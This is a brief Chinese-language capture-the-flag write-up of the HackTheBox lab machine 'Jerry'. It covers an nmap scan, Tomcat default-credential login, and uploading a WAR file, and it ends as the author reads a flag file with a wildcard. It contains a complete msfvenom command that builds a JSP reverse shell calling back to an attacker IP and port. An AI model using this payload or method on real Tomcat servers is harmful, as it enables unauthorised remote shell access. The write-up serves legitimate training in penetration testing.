Jerry - HackTheBox
nmap扫描
就一个8080的tomcat端口,访问
猜一下弱口令
admin:admin跳转了
貌似不对
错误页面爆出了默认密码,尝试一下
msf生成一个反弹shell的war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=7777 -f war -o shell.war
上传
没找到root.txt和user.txt,只有一个这个2 for the price of 1.txt
直接读取读不出来
用通配符读取一下